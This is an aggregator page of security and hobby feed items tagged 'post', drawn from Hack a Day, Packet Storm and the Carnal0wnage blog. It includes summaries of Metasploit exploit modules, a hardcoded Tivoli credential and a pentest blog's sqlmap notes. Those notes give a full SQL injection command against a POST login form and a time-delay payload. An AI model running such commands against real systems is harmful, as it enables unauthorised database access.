«
Expand/Collapse
95 items tagged "post"
Related tags:
authentication [+],
day [+],
roundup [+],
universal [+],
sql [+],
plugin [+],
manager wordpress [+],
information [+],
hacks [+],
denial of service [+],
week [+],
denial [+],
based buffer overflow [+],
revolution [+],
news [+],
exploitation [+],
ucan [+],
thumbnail [+],
third party [+],
shellscript [+],
root compromise [+],
read [+],
ransack [+],
plugin version [+],
penetration testers [+],
information disclosure vulnerability [+],
hackers [+],
forgery [+],
featured [+],
drupal [+],
disclosure [+],
darknet [+],
cross [+],
buffer [+],
bea weblogic [+],
apache [+],
alert [+],
affiliate [+],
wouters [+],
world authors [+],
webapps [+],
tomatocart [+],
tivoli endpoint [+],
tivoli [+],
squarecms [+],
sql injection [+],
service tool [+],
query buffer [+],
pivot [+],
penetration test [+],
paul wouters [+],
meterpreter [+],
metasploit [+],
linux [+],
kaminsky [+],
inclusion [+],
ibm [+],
http [+],
hackaday [+],
erronous [+],
dns [+],
denial of service attacks [+],
classic [+],
black hat [+],
BackTrack [+],
vulnerability [+],
wordpress [+],
zombie [+],
year [+],
xss [+],
world [+],
wordlists [+],
word list [+],
web technology [+],
vulnerability assessments [+],
vulnerability assessment [+],
vulnerabilities [+],
video content [+],
video [+],
using the word [+],
usa [+],
url url [+],
url [+],
upnp [+],
university of pennsylvania [+],
university of new hampshire [+],
ultimate calculator [+],
typo3 [+],
typo [+],
tutorial [+],
tupac [+],
trust [+],
transistors [+],
transience [+],
timer [+],
time lapse photography [+],
time [+],
tilt rotor [+],
ti 83 calculator [+],
test reports [+],
tag [+],
sqlmap [+],
slides [+],
should [+],
sensor data [+],
schematics [+],
rsmangler [+],
rotor design [+],
rootkit [+],
robots [+],
retarded [+],
reddit [+],
realistic scenarios [+],
reader [+],
rant [+],
random intervals [+],
qr code [+],
python [+],
processor fan [+],
postcards [+],
post mortem [+],
playbook [+],
platinum [+],
place [+],
pixel [+],
pistol [+],
pip boy [+],
piece [+],
picture [+],
pic micro controllers [+],
periodic table [+],
pen [+],
pcs [+],
pbs [+],
password [+],
org uk [+],
opinion [+],
nuka cola [+],
newsweek [+],
multiple [+],
mouths [+],
mortem [+],
mike craghead [+],
michael [+],
maze [+],
maturity level [+],
martin khoo [+],
malware [+],
lord vetinari [+],
logo [+],
linux on a 386 [+],
links [+],
library [+],
leds [+],
larry [+],
kevin dady [+],
john [+],
jerusalem post [+],
jerusalem [+],
jailbreak [+],
ir communications [+],
internal assets [+],
input peripherals [+],
input devices [+],
input [+],
injection [+],
indian web [+],
how to [+],
halloween [+],
hacking [+],
google [+],
ghost [+],
german postal service [+],
gadget [+],
functional copy [+],
ftp [+],
flashlight [+],
fixing [+],
fan [+],
fallout [+],
fake [+],
facebook [+],
f king [+],
estonia [+],
education [+],
don [+],
discworld [+],
digital [+],
deutsche [+],
damn [+],
dady [+],
cyber strategy [+],
cracker [+],
couple hours [+],
copy [+],
cool links [+],
computer kiosk [+],
commenters [+],
cola [+],
coil gun [+],
code [+],
christopher [+],
chris [+],
cemetech [+],
catid [+],
card [+],
cameras [+],
calculator version [+],
calculator [+],
buffer overflow vulnerability [+],
bounty [+],
bot [+],
boileau [+],
blog [+],
blackberry [+],
ball [+],
audio [+],
asia [+],
all sorts [+],
alex [+],
adam boileau [+],
accurate time [+],
Tools [+],
Retards [+],
ExploitsVulnerabilities [+],
360 degree view [+],
Weekly [+],
cross site scripting [+]
-
-
9:01
»
Hack a Day
[Christopher] piped up in our comments on a recent post about using laptop touch pads in other things, noting that he had done this on his Ultimate Calculator Version 2. What he’s done is upgraded his TI-83+ calculator to house a number of improvements and customizations. It now has a stronger RGB backlight so he [...]
-
-
7:58
»
Packet Storm Security Exploits
This Metasploit module exploits a stack based buffer overflow in the BEA Weblogic Apache plugin. The connector fails to properly handle specially crafted HTTP POST requests, resulting a buffer overflow due to the insecure usage of sprintf. Currently, this module works over Windows systems without DEP, and has been tested with Windows 2000 / XP. In addition, the Weblogic Apache plugin version is fingerprinted with a POST request containing a specially crafted Transfer-Encoding header.
-
7:58
»
Packet Storm Security Recent Files
This Metasploit module exploits a stack based buffer overflow in the BEA Weblogic Apache plugin. The connector fails to properly handle specially crafted HTTP POST requests, resulting a buffer overflow due to the insecure usage of sprintf. Currently, this module works over Windows systems without DEP, and has been tested with Windows 2000 / XP. In addition, the Weblogic Apache plugin version is fingerprinted with a POST request containing a specially crafted Transfer-Encoding header.
-
7:58
»
Packet Storm Security Misc. Files
This Metasploit module exploits a stack based buffer overflow in the BEA Weblogic Apache plugin. The connector fails to properly handle specially crafted HTTP POST requests, resulting a buffer overflow due to the insecure usage of sprintf. Currently, this module works over Windows systems without DEP, and has been tested with Windows 2000 / XP. In addition, the Weblogic Apache plugin version is fingerprinted with a POST request containing a specially crafted Transfer-Encoding header.
-
-
16:09
»
Packet Storm Security Recent Files
Ransack is a post exploitation shellscript for penetration testers. Its purpose is to grab any information deemed relevant on a system, post root compromise. This information may include config files, ssh keys, ssl keys, or any other information deemed valuable.
-
16:09
»
Packet Storm Security Tools
Ransack is a post exploitation shellscript for penetration testers. Its purpose is to grab any information deemed relevant on a system, post root compromise. This information may include config files, ssh keys, ssl keys, or any other information deemed valuable.
-
16:09
»
Packet Storm Security Misc. Files
Ransack is a post exploitation shellscript for penetration testers. Its purpose is to grab any information deemed relevant on a system, post root compromise. This information may include config files, ssh keys, ssl keys, or any other information deemed valuable.
-
-
7:01
»
Hack a Day
Yet another Fallout post here on Hackaday. This time, instead of the PIP-Boy, someone has built a fantastic prop for the iconic Nuka-Cola. The circuit is super simple, really just an LED array to light up the beverage just right. The construction of the base is quite nice though. If you’re a fan of functional [...]
-
-
6:00
»
Hack a Day
In case you have been on vacation, here is the best that we have had on our blog in the past week: In first place is a post about [the University of Pennsylvania's] quadcopter team. This time they have a group of twenty quadcopters flying in formation. In second place is a post about a [...]
-
-
13:01
»
Hack a Day
2011 was an interesting year here at Hackaday. We have about 24% more viewers now than we did last year. We started producing our own video content and we have shown some pretty interesting projects in our daily posts. In this post, we are gathering together the best of the best. Our #1 post for [...]
-
6:00
»
Hack a Day
In case you missed them the first time, here are our most popular posts from the past week. In first place is a post that made our mothers’ wash our mouths out with soap. It is a periodic table of swearing! Up next is a post about a micromouse robot that can run a maze [...]
-
-
6:01
»
Hack a Day
The “Picture Post”, a tool for a program going on through the University of New Hampshire, is a method of taking what amounts to extreme time-lapse photography. The purpose of this project is to observe the world around you with a 360 degree view taken at a regular interval. The setup is quite simple consisting [...]
-
-
7:00
»
Hack a Day
In case you missed them the first time, here are the most popular posts from this week: Our most popular post this week was about how to use HTML5 to display sensor data. This is a pretty interesting demo of the new web technology. Next up is a post about an animatronic zombie that can [...]
-
-
7:00
»
Hack a Day
In case you missed them the first time, here are our most popular posts from the past week. Our most popular post of the week was about a ball that has a matrix of 256 LEDs encrusted onto its surface, allowing all sorts of patterns to be displayed. Next up is a post about the [...]
-
-
7:00
»
Hack a Day
In case you missed them the first time, here are our most popular posts from the past week. Our most popular post this week is about a clock modeled after Lord Vetinari’s clock in Discworld that ticks at random intervals but keeps accurate time. Our next most popular post is of a project that takes [...]
-
-
10:00
»
Hack a Day
In case you missed them the first time, here are our most popular posts from this past week. Our most popular post was about a ‘flashlight’ build. We are using the word flashlight loosely since this monster can draw up to 500 Watts! Our next most popular post was about another [Jörg Sprave] project where [...]
-
-
8:01
»
Hack a Day
In case you missed them, here are our biggest posts from the past week. For the weapons enthusiasts in our audience, make sure to check out our most popular post this week where [Liquider] shows a project in which an airsoft pistol was converted into a coil gun. Our next most popular post was based [...]
-
-
7:00
»
Hack a Day
In case you missed them, here are our biggest posts from the past week. The post that drew the most attention this week was our own [Kevin Dady]‘s post about how to install Linux on a 386. In this post, he talks about the process that he used to put a functional copy of Linux [...]
-
-
18:00
»
Hack a Day
After writing this post on somone hacking QR codes, Hack A Day commenters came out in full force posting some really cool links about modifying QR codes to include a logo. I’ll fully admit I geeked out a little, but in the process I figured out some of the theory behind embedding logos in QR [...]
-
-
11:58
»
Hack a Day
After seeing our communications via light post , reader [Chris] dropped this handy little link in our inbox. A very good tutorial about using infrared to enable communications between 2 pic micro controllers. The tutorial covers all the parts you will need, physical wiring and schematics with notes detailing each section of the circuit. It [...]
-
-
0:52
»
Packet Storm Security Recent Files
Whitepaper called Post Exploitation using Metasploit pivot and port forward. A very nice feature in Metasploit is the ability to pivot through a meterpreter session to the network on the other side. This tutorial walks you through how this is done once you have a meterpreter session on a foreign box.
-
0:52
»
Packet Storm Security Misc. Files
Whitepaper called Post Exploitation using Metasploit pivot and port forward. A very nice feature in Metasploit is the ability to pivot through a meterpreter session to the network on the other side. This tutorial walks you through how this is done once you have a meterpreter session on a foreign box.
-
-
9:45
»
Packet Storm Security Recent Files
This Metasploit module exploits a stack based buffer overflow in the way IBM Tivoli Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query arguments. This issue can be triggered by sending a specially crafted HTTP POST request to the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization is required. This exploit makes use of a second vulnerability, a hardcoded account (tivoli/boss) is used to bypass the authorization restriction.
-
9:45
»
Packet Storm Security Misc. Files
This Metasploit module exploits a stack based buffer overflow in the way IBM Tivoli Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query arguments. This issue can be triggered by sending a specially crafted HTTP POST request to the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization is required. This exploit makes use of a second vulnerability, a hardcoded account (tivoli/boss) is used to bypass the authorization restriction.
-
-
11:43
»
Packet Storm Security Exploits
Post Revolution version 0.8.0c suffers from cross site request forgery, cross site scripting, and denial of service vulnerabilities.
-
-
10:00
»
Hack a Day
Instructables user [Mike Craghead] was in the middle of building a very compact public computer kiosk when he ran into a problem with the processor fan. It was too big for the enclosure and had to be swapped out with a fan that did not allow the motherboard to monitor its rotational speed. Motherboards don’t [...]
-
-
19:14
»
Carnal0wnage
So first a disclaimer, i didnt listen to the referenced podcast, this is based solely of this blog post:
http://newschoolsecurity.com/2011/04/data-driven-pen-testsSo I’m listening to the “Larry, Larry, Larry” episode of the Risk Hose podcast, and Alex is talking about data-driven pen tests. I want to posit that pen tests are already empirical. Pen testers know what techniques work for them, and start with those techniques.
What we could use are data-driven pen test reports. “We tried X, which works in 78% of attempts, and it failed.”
We could also use more shared data about what tests tend to work.
Thoughts?
Dre's response to the post was surprising to me, he listed a bunch of tools that seem to do correlating of pentest results into a portal so you can trend over time. Cool idea, i'll give the people that. But to me when we start jumping into repeatable metrics driven stuff we are in Vulnerability Assessment land, not pentesting land.
Here is the comment I left:
I like the idea and i think it could be useful.However, they need to drop the pentest part. you are solidly into the vulnerability assessment part of things when you are talking about “ok, i tried 1,2,3,4,5 and 1 & 3 worked” ok on to the next set of tests… thats vulnerability assessment (with exploitation if you want to get technical) and not pentesting.
pentesting is about that human looking at the problem and figuring out how to break it, not some scanner, thats going to be very hard to standardize and put hard numbers on and i dont think its going to be possible without tying up your tester’s time with bullshit.
I'm all for "repeatable" pentests. You should have a methodology for each type of test, but when you are paying for human's time you should be paying for them to go after the site like a human would and not how a scanner would or not in a way where i'm worried about religiously following some checklist because if i don't the metrics get all fucked up. Your pentest should come after you have thrown the kitchen sink at it scanner wise.
as an added bonus this post was right below the new school post in my Google reader:
http://coding-insecurity.blogspot.com/2011/04/developing-good-methodology-part-3.htmlThis post and really any methodology document you will ever read or write will have gaps, because no document on this subject can ever really be 100% all inclusive of every vulnerability and the myriad of variations that exist for many of these.
I think it drives the point home as well.
-CG
-
-
5:29
»
Carnal0wnage
Notes for sqlmap and POST requests since every f**king tutorial only covers GETs
options you'll want to use
-u URL, --url=URL
--method=METHOD
--data=DATA
-p TESTPARAMETER
--prefix=PREFIX
--postfix=POSTFIX
--dbms=DBMS
*--dbms= if sqlmap is sucking
we'll assume we have a simple post request
user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2
--method to pass the POST option
--data to pass the paramaters that are required for the POST
-p to pass the injectable field, so in this case the username field (usernameTxt)
--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query
--dbms to tell it the backend was mssql
this yields us an sqlmap query like so:
Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---
-
-
6:04
»
Hack a Day
[Stealth] put together a post explaining how he writes drivers for input peripherals. He’s using Python which makes the process fairly painless (we’ll get to that in a minute) but the value of his post is in the explanation surrounding how to interpret the data. Once you know how the communications are coming in from [...]
-
-
14:30
»
Hack a Day
This post on Reddit by [superangryguy] caught our attention today. He’s put together a video explaining the basics of how to build balancing robots, focusing on a 555 timer based one. He’s got two main versions, the 555 based one and another that is based off of two transistors. He says the 555 based one [...]
-
-
8:34
»
Carnal0wnage
received this comment to Val's post
"Submitted by Anonymous on Tue, 01/04/2011 - 09:33.
The problem with pentesters phishing ... The problem with pentesters phishing ... is that it does more harm then good for the organization. Without the education piece following a phish, you setup the organization to ban the practice."
Phishing and client-side attacks have been going on for far too long to not allow your testers to use them during test.**
So on one hand you are correct, every phishing exercise done either by an internal team, pentester, or attacker should be followed by an
education piece by your internal security/IT team. Every phishing attack is an opportunity to retrain users.
On the other other hand, its how people get in. To broadly call it useless because 1. you are too lazy to educate your users after the fact or 2. didn't think ahead enough to require the PT shop to leave you with education materials or follow up the phish with an education piece doesn't mean it lacks value.
Like I mentioned in the previous post, you need to know how you are going to stand up in realistic scenarios. Does one client-side 0day leave your whole network open to all sorts of badness? you need to know.
**This is assuming that the company's maturity level supports doing a phishing exercise. If your internal security just plain sucks, then you could probably win the argument that no phishing should be conducted but I would counter with why are you getting a Pentest in the first place if things are that bad. Use those consulting dollars to have the consultant help you with your risk plan, internal vulnerability scanning/patching program, workstation/server hardening or teaching you how to scan your internal assets yourself. To steal a
Nickerson analogy..."how do you know you can put up a fight if you cant take punch" BUT that doesnt mean you start out getting your ass kicked by starting training with [INSERT MMA BADASS HERE] instead of working your way up.
-
-
6:17
»
Packet Storm Security Recent Files
This OWASP HTTP Post denial of service tool was created for testing web applications for availability concerns from HTTP GET and HTTP POST denial of service attacks.
-
6:17
»
Packet Storm Security Misc. Files
This OWASP HTTP Post denial of service tool was created for testing web applications for availability concerns from HTTP GET and HTTP POST denial of service attacks.
-
-
10:15
»
Hack a Day
We know you just got a links post a couple hours ago, but more people tipped us off to some great Halloween stuff and we just couldn’t wait. [Michael] came up with this fantastic idea for a flying ghost. He’s using a twin prop tilt rotor design to fly his ghost all over the neighborhood. [...]
1337day (was: Inj3ct0r, 1337db)
OSVDB Vulnerabilities
Exploit-DB
SecurityFocus Vulnerabilities
Bugtraq
XSSed
Sophos security news
Penetration Testing
SecuriTeam
BackTrack Linux Forums
Threatpost
SecDocs
carnal0wnage.attackresearch.com
Darknet
The Exploitant
Wirevolution